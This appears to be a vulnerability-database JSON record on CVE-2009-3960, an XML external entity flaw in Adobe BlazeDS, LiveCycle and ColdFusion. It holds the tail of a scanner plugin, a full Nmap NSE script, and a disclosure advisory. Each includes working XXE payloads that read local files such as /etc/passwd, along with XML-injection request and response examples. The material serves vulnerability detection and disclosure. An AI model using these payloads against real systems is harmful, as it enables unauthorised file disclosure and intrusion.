);\n\nhost = http_host_name( port:port );\n\nuseragent = http_get_user_agent();\n\nforeach url( urls ) {\n\n foreach file( keys( files ) ) {\n\n xxe = '<?xml version=\"1.0\" encoding=\"utf-8\"?>' +\n '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"/' + files[file] + '\"> ]>' +\n '<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">' +\n '<body>' +\n '<object type=\"flex.messaging.messages.CommandMessage\">' +\n '<traits>' +\n '<string>body</string><string>clientId</string><string>correlationId</string>' +\n '<string>destination</string><string>headers</string><string>messageId</string>' +\n '<string>operation</string><string>timestamp</string><string>timeToLive</string>' +\n '</traits><object><traits />' +\n '</object>' +\n '<null /><string /><string />' +\n '<object>' +\n '<traits>' +\n 
'<string>DSId</string><string>DSMessagingVersion</string>' +\n '</traits>' +\n '<string>nil</string><int>1</int>' +\n '</object>' +\n '<string>&xxe;</string>' +\n '<int>5</int><int>0</int><int>0</int>' +\n '</object>' +\n '</body>' +\n '</amfx>';\n\n len = strlen( xxe );\n\n req = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n 'Content-Type: application/x-amf\\r\\n' +\n '\\r\\n' +\n xxe;\n\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n if( egrep( string:buf, pattern:file, icase:TRUE ) ) {\n report = report_vuln_url( url:url, port:port );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nmap": [{"lastseen": "2018-07-12T16:22:05", "bulletinFamily": "scanner", "description": "Exploits cve-2009-3960 also known as Adobe XML External Entity Injection. \n\nThis vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0 \n\nFor more information see: \n\n * http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n * http://www.osvdb.org/62292\n * Metasploit module: auxiliary/scanner/http/adobe_xml_inject\n\n### See also:\n\n * http-adobe-coldfusion-apsa1301.nse \n * http-coldfusion-subzero.nse \n * http-vuln-cve2010-2861.nse \n\n## Script Arguments \n\n#### http-vuln-cve2009-3960.root \n\nPoints to the root path. Defaults to \"/\"\n\n#### http-vuln-cve2009-3960.readfile \n\ntarget file to be read. Defaults to \"/etc/passwd\"\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. 
\n\n#### http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root=\"/root/\" <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-vuln-cve2009-3960:\n | samples/messagebroker/http\n | <?xml version=\"1.0\" encoding=\"utf-8\"?>\n | <amfx ver=\"3\"><body targetURI=\"/onResult\" responseURI=\"\"><object type=\"flex.messaging.messages.AcknowledgeMessage\"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash\n | bin:*:1:1:bin:/bin:/sbin/nologin\n | daemon:*:2:2:daemon:/sbin:/sbin/nologin\n | adm:*:3:4:adm:/var/adm:/sbin/nologin\n | lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin\n | sync:*:5:0:sync:/sbin:/bin/sync\n | shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown\n | halt:*:7:0:halt:/sbin:/sbin/halt\n | mail:*:8:12:mail:/var/spool/mail:/sbin/nologin\n | news:*:9:13:news:/etc/news:\n | uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin\n | operator:*:11:0:operator:/root:/sbin/nologin\n | games:*:12:100:games:/usr/games:/sbin/nologin\n | gopher:*:13:30:gopher:/var/gopher:/sbin/nologin\n | ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin\n | nobody:*:99:99:Nobody:/:/sbin/nologin\n | nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin\n | vcsa:!!:69:69:virtual console 
memory owner:/dev:/sbin/nologin\n | pcap:!!:77:77::/var/arpwatch:/sbin/nologin\n | mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin\n | ...\n |_\n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * table\n * vulns\n\n* * *\n", "modified": "2017-06-27T15:01:27", "published": "2012-01-02T19:48:42", "id": "NMAP:HTTP-VULN-CVE2009-3960.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2009-3960.html", "title": "http-vuln-cve2009-3960 NSE Script", "type": "nmap", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nExploits cve-2009-3960 also known as Adobe XML External Entity Injection.\n\nThis vulnerability permits to read local files remotely and is present in\nBlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data\nServices 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and\nColdFusion 7.0.2, 8.0, 8.0.1, and 9.0\n\nFor more information see:\n* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n* http://www.osvdb.org/62292\n* Metasploit module: auxiliary/scanner/http/adobe_xml_inject\n]]\n\n---\n-- @see http-adobe-coldfusion-apsa1301.nse\n-- @see http-coldfusion-subzero.nse\n-- @see http-vuln-cve2010-2861.nse\n--\n-- @args http-vuln-cve2009-3960.root Points to the root path. Defaults to \"/\"\n-- @args http-vuln-cve2009-3960.readfile target file to be read. 
Defaults to \"/etc/passwd\"\n--\n-- @usage\n-- nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root=\"/root/\" <target>\n--\n--@output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n--| http-vuln-cve2009-3960:\n--| samples/messagebroker/http\n--| <?xml version=\"1.0\" encoding=\"utf-8\"?>\n--| <amfx ver=\"3\"><body targetURI=\"/onResult\" responseURI=\"\"><object type=\"flex.messaging.messages.AcknowledgeMessage\"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash\n--| bin:*:1:1:bin:/bin:/sbin/nologin\n--| daemon:*:2:2:daemon:/sbin:/sbin/nologin\n--| adm:*:3:4:adm:/var/adm:/sbin/nologin\n--| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin\n--| sync:*:5:0:sync:/sbin:/bin/sync\n--| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown\n--| halt:*:7:0:halt:/sbin:/sbin/halt\n--| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin\n--| news:*:9:13:news:/etc/news:\n--| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin\n--| operator:*:11:0:operator:/root:/sbin/nologin\n--| games:*:12:100:games:/usr/games:/sbin/nologin\n--| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin\n--| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin\n--| nobody:*:99:99:Nobody:/:/sbin/nologin\n--| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin\n--| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin\n--| pcap:!!:77:77::/var/arpwatch:/sbin/nologin\n--| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin\n--| ...\n--|_\n\nauthor = \"Hani Benhabiles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\", \"intrusive\", \"vuln\"}\n\n\nportrule = 
shortport.http\n\naction = function(host, port)\n -- Matching returned response body to confirm vulnerability\n local matchstart = '<?xml version=\"1.0\" encoding=\"utf-8\"?>'\n local matchend = '</string><null/></object></body></amfx>'\n local matchsize = 120\n local matchnotvuln = '<string>External entities are not allowed</string>'\n\n local results = {}\n local root = stdnse.get_script_args(SCRIPT_NAME .. \".root\") or \"/\"\n local readfile = stdnse.get_script_args(SCRIPT_NAME .. \".readfile\") or \"/etc/passwd\"\n\n local paths = {\n \"messagebroker/http\",\n \"messagebroker/httpsecure\",\n\n -- Coldfusion\n \"flex2gateway/http\",\n \"flex2gateway/httpsecure\",\n\n -- BlazeDS\n \"blazeds/messagebroker/http\",\n \"blazeds/messagebroker/httpsecure\",\n \"samples/messagebroker/http\",\n \"samples/messagebroker/httpsecure\",\n\n -- LiveCycle Data Services\n \"lcds/messagebroker/http\",\n \"lcds/messagebroker/httpsecure\",\n \"lcds-samples/messagebroker/http\",\n \"lcds-samples/messagebroker/httpsecure\",\n }\n\n local exploit = [[<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE test\n [ <!ENTITY x3 SYSTEM \"]].. readfile\n .. 
[[\"> ]><amfx ver=\"3\"\n xmlns=\"http://www.macromedia.com/2005/amfx\"><body>\n <object type=\"flex.messaging.messages.CommandMessage\">\n <traits><string>body</string><string>clientId</string>\n <string>correlationId</string><string>destination</string>\n <string>headers</string><string>messageId</string><string>\n operation</string><string>timestamp</string><string>timeToLive\n </string></traits><object><traits /></object><null /><string />\n <string /><object><traits><string>DSId</string><string>\n DSMessagingVersion</string></traits><string>nil</string>\n <int>1</int></object><string>&x3;</string><int>5</int>\n <int>0</int><int>0</int></object></body></amfx>]]\n\n\n local options = {header={[\"Content-Type\"]=\"application/x-amf\"}}\n local path\n\n local http_vuln = {\n title = \"Adobe XML External Entity Injection\",\n IDS = {CVE = 'CVE-2009-3960'},\n risk_factor = \"High\",\n scores = {\n CVSSv2 = \"4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N)\",\n },\n description = [[\nPermits to read local files remotely and is present in\nBlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data\nServices 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and\nColdFusion 7.0.2, 8.0, 8.0.1, and 9.0]],\n references = {\n 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf',\n 'http://www.osvdb.org/62292'\n },\n dates = {\n disclosure = {year = '2010', month = '02', day = '15'},\n },\n exploit_results = {},\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n http_vuln.state = vulns.STATE.NOT_VULN\n\n for _,path in pairs(paths) do\n local uri = root .. 
path\n local response = http.post(host, port, uri, options, nil, exploit)\n\n if response.status == 200 then\n if #response.body >= matchsize and\n string.sub(response.body,1,string.len(matchstart))==matchstart and\n string.sub(response.body,-string.len(matchend))==matchend and\n string.match(response.body, matchnotvuln)==nil\n then\n table.insert(results, {'File: ' .. readfile .. ' extracted via ' .. path .. '\\n\\n',{response.body}})\n http_vuln.extra_info = stdnse.format_output(true, results)\n http_vuln.state = vulns.STATE.EXPLOIT\n end\n end\n end\n\n return report:make_output(http_vuln)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T18:14:46", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2010-02-22T00:00:00", "published": "2010-02-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19164", "id": "SSV:19164", "title": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities", "type": "seebug", "sourceData": "\n Multiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n \r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n \r\n+-----------+\r\n|Description|\r\n+-----------+\r\n \r\nSecurity-Assessment.com discovered that multiple Adobe\r\nproducts with different Data Services versions are\r\nvulnerable to XML External Entity (XXE) and XML\r\ninjection attacks.\r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure,\r\nTCP scans and Denial of Service condition, which can\r\nbe achieved by recursive entity injection, attribute\r\nblow up and other types of injection.\r\nFor more information about the implications 
associated\r\nto this vulnerability, refer to the RFC2518 (17.7\r\nImplications of XML External Entities):\r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n \r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n \r\nAdobe Data Services components provide Flex/RIA\r\napplications with data messaging, remoting and\r\nmanagement capabilities.\r\n \r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively\r\n\u201cmx.messaging.channels.HTTPChannel\u201d and\r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These\r\nclasses are part of the Data Services Messaging\r\nclasses and can be found in the\r\nflex-messaging-common.jar Java archive.\r\n \r\nThe HTTPChannel transports data in the AMFX format,\r\nwhich is the text-based XML representation of AMF.\r\nThe HTTPChannel endpoints are defined in the\r\nservices-config.xml file, located within the\r\nFlex/WEB-INF folder of the application.\r\nBy default, the HTTPChannel classes are mapped to\r\nthe following endpoints:\r\n \r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n \r\nNote that the HTTPChannel may be mapped to different\r\nendpoints.\r\nThis depends on the deployed application and the\r\nframework in use (e.g. BlazeDS, Adobe LiveCycle\r\nData Services, etc.).\r\n \r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n \r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. 
The XML parser\r\nparses the payload and successfully processes\r\ninjected entities.\r\n \r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n \r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n \r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>\r\n<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">\r\n <body>\r\n <object type="flex.messaging.messages.CommandMessage">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n </body>\r\n</amfx>\r\n \r\n \r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI="/onResult" responseURI="">\r\n<object 
type="flex.messaging.messages.AcknowledgeMessage">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n \r\n \r\nThe above injection was successfully tested on\r\nmultiple Adobe products, as shown below:\r\n \r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n4. 
Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\nThe vendor has released several patches for this\r\nvulnerability. See the Solution section of this\r\ndocument for more information.\r\n \r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n \r\nThe XML parser lacks proper input and output\r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response.\r\nThe following table shows an XML injection in the\r\nBlazeDS HTTPChannel. The injected payload becomes\r\npart of the response. In this case, injection is\r\npossible via the \u201cresponseURI\u201d attribute.\r\n \r\nXML Injection \u2013 BlazeDS - Request\r\n \r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>\r\n</body></amfx>\r\n \r\nXML Injection \u2013 BlazeDS - Response\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>\r\n \r\nThe above injection was successfully tested on\r\nmultiple Adobe products, as shown below:\r\n \r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\n2. 
Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\nThe vendor has released several patches for this\r\nvulnerability. See the Solution section of this\r\ndocument for more information.\r\n \r\n \r\n+--------+\r\n|Solution|\r\n+--------+\r\n \r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after\r\ndiscovering the issues. The vendor was contacted on\r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on\r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the\r\nfollowing website:\r\n \r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n \r\n \r\n+------+\r\n|Credit|\r\n+------+\r\n \r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. 
Personal Page: http://malerisch.net/\r\n \r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n \r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n \r\n \r\n+---------+\r\n|Greetings|\r\n+---------+\r\n \r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n \r\n \r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n \r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n \r\nRoberto Suggi Liverani\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19164"}]}